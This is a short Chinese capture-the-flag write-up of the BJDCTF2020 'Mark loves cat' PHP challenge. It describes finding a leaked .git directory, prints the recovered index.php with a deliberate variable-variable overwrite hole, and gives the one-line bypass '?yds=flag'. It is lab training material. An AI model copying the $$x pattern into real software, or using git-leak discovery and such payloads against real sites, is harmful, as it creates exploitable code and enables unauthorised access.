[BJDCTF2020]Mark loves cat

首页长这样

炫酷.jpg

既然想不到啥方法,那就扫目录看看八

git目录,有一个flag.php

康康git泄漏

flag.phplolcat真好玩QwQ)

index.php

<?php
include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

echo "the flag is: ".$flag;

emmm,虽然但是,这个不是让$_GET['yds']='flag'就绕过了嘛,感觉有点像脑筋急转弯.jpg

?yds=flag

#Web #PHP #代码审计 #可变变量 #目录扫描 #git泄露